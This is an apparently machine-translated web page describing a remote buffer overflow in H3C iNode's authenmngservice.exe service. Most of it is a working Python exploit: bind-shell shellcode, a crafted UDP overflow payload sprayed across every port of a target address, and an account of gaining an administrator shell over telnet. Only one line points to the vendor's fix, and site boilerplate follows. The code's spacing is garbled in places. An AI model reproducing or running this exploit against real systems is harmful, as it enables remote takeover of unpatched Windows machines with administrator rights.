INode remote buffer overflow execute arbitrary code 0Day as Administrator

Source: Internet
Author: User

H3C iNode is a management software designed and developed by Hangzhou H3C Communication Technology Co., Ltd. for user authentication and internet access. The software has a buffer overflow vulnerability. Attackers can remotely send attack packets and trigger vulnerability overflow, execute the shell attack.
The vulnerability exists in the authenmngservice.exe file behind inodesoftware installation. It runs as an administrator and opens a port. This service module has a buffer overflow vulnerability. Attackers can remotely send UDP Attack Packets, trigger vulnerability overflow, and execute an attack shell. Software Versions involved in this vulnerability: iNode PC 5.2 (E0402) iNode PC 5.1 (E0304) iNode PC 5.0 (E0105) other earlier versions cannot be downloaded directly online and are not verified. The vulnerability is located in the sub_459F10 function of IDA disassembly result. The memcpy function of the vulnerability at 0x45A235 is located as follows: the number of copied bytes is under external control, so malicious data is imported, this vulnerability can cause remote buffer overflow and trigger the code poc. py:

Import socketimport timeExploit_addr = raw_input ("input attack ip addr:") s = socket. socket (socket. AF_INET, socket. SOCK_DGRAM) # bind the shellcode on port 4444, after the overflow succeeds, telnet to the target host shellcode = "\ xfc \ xe8 \ x89 \ x00 \ x00 \ x00 \ x60 \ x89 \ xe5 \ x31" \ "\ xd2 \ x64 \ x8b \ x52 \ x30 \ x8b \ x52 \ x0c \ x8b \ x52 "\" \ x14 \ x8b \ x72 \ x28 \ x0f \ xb7 \ x4a \ x26 \ x31 \ xff "\ "\ x31 \ xc0 \ xac \ x3c \ x61 \ x7c \ x02 \ x2c \ x20 \ xc1" \ "\ xcf \ x0d \ x01 \ xc7 \ xe2 \ xf0 \ x52 \ x57 \ x8b \ x52 "\" \ x10 \ x8b \ x42 \ x3c \ x01 \ xd0 \ x8b \ x40 \ x78 \ x85 "\" \ xc0 \ x74 \ x4a \ x01 \ xd0 \ x50 \ x8b \ x48 \ x18 \ x8b "\" \ x58 \ x20 \ x01 \ xd3 \ xe3 \ x3c \ x49 \ x8b \ x34 \ x8b "\" \ x01 \ xd6 \ x31 \ xff \ x31 \ xc0 \ xac \ xc1 \ xcf \ x0d "\" \ x01 \ xc7 \ x38 \ xe0 \ x75 \ xf4 \ x03 \ x7d \ xf8 \ x3b" \ "\ x7d \ x24 \ x75 \ xe2 \ x58 \ x8b \ x58 \ x24 \ x01 \ xd3" \ "\ x66 \ x8b \ x0c \ x4b \ x8b \ x58 \ x1c \ x01 \ xd3 \ x8b "\" \ x04 \ x8b \ x01 \ xd0 \ x89 \ x44 \ x24 \ x24 \ x5b \ x5b "\" \ x61 \ x59 \ x5a \ x51 \ xff \ xe0 \ x58 \ x5f \ x5a \ x8b "\" \ x12 \ xeb \ x86 \ x5d \ x68 \ x33 \ x32 \ x00 \ x00 \ x68 "\" \ x77 \ x73 \ x32 \ x5f \ x54 \ x68 \ x4c \ x77 \ x26 \ x07 "\" \ xff \ xd5 \ xb8 \ x90 \ x01 \ x00 \ x00 \ x29 \ xc4 \ x54 "\" \ x50 \ x68 \ x29 \ x80 \ x6b \ x00 \ xff \ xd5 \ x50 \ x50 "\" \ x50 \ x50 \ x40 \ x50 \ x40 \ x50 \ x68 \ xea \ x0f \ xdf "\" \ xe0 \ xff \ xd5 \ x89 \ xc7 \ x31 \ xdb \ x53 \ x68 \ x02 "\" \ x00 \ x11 \ x5c \ x89 \ xe6 \ x6a \ x10 \ x56 \ x57 \ x68 "\" \ xc2 \ xdb \ x37 \ x67 \ xff \ xd5 \ x53 \ x57 \ x68 \ xb7 "\" \ xe9 \ x38 \ xff \ xd5 \ x53 \ x53 \ x57 \ x68 \ x74 "\" \ xec \ x3b \ xe1 \ xff \ xd5 \ x57 \ x89 \ xc7 \ x68 \ x75 "\" \ x6e \ x4d \ x61 \ xff \ xd5 \ x68 \ x63 \ x6d \ x64 \ x00 "\" \ x89 \ xe3 \ x57 \ x57 \ x57 \ x31 \ xf6 \ x6a \ x12 \ x59 "\" \ x56 \ xe2 \ xfd \ x66 \ xc7 \ x44 \ x24 \ x3c \ x01 \ x01 "\" \ x8d \ x44 \ x24 \ x10 \ xc6 \ x00 \ x44 \ x54 \ x50 \ x56 "\" \ x56 \ x56 \ x46 \ x56 \ x4e \ x56 \ x56 \ x53 \ x56 \ x68 "\"\ x79 \ xcc \ x3f \ x86 \ xff \ xd5 \ x89 \ xe0 \ x4e \ x56 "\" \ x46 \ xff \ x30 \ x68 \ x08 \ x87 \ x1d \ x60 \ xff \ xd5 "\" \ xbb \ xf0 \ xb5 \ xa2 \ x56 \ x68 \ xa6 \ x95 \ xbd \ x9d "\" \ xff \ xd5 \ x3c \ x06 \ x7c \ x0a \ x80 \ xfb \ xe0 \ x75 "\" \ x05 \ xbb \ x47 \ x13 \ x72 \ x6f \ x6a \ x00 \ x53 \ xff "\" \ xd5 "exploit_data =' \ x00 \ x01 '+ 'A' * 14 +' \ xDA \ xF4 \ x54 \ xA3 \ x57 \ xEA \ xA2 \ x58 \ xFF \ xA0 \ x61 \ xD7 \ xFB \ xAF \ x3C \ x9C '+' \ x01 \ x01 \ x01 \ x21 \ x08 '+' \ x22 '* 7 +' \ x01 '+' \ x90' * 335 + shellcode + '\ xE9 \ x13 \ xFE \ xFF' + 'A' * 7 + '\ xEB \ xF2 \ x90 \ x90 \ x71 \ x15 \ xFA \ x7f' +' \ x71 \ x15 \ xFA \ x7F '+' \ x90' * 15 + '\ xEB \ xE3' for port in range (1024,655 36): address = (Exploit_addr, port) s. sendto (exploit_data, address) print 'port: ', porttime. sleep (0.001) s. close () print 'ploit end' raw _ input ()

 

After the software is installed, authenmngservice.exe runs as administrator. After the attack program is enabled and the IP address is entered to launch the attack program, you can see that the program has not exited. When you enable telnet to prepare the connection target, you can see that you have remotely logged on to the target system, but the attacked program has not exited. Enter the calc.execommand to start the computer. You can see that calc.exe is the administrator privilege.

  Solution:H3C has released a vulnerability-targeted solution and a new inode version. Reference link: http://kms.h3c.com/kms/kms/search/view.html? Id = 23553

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.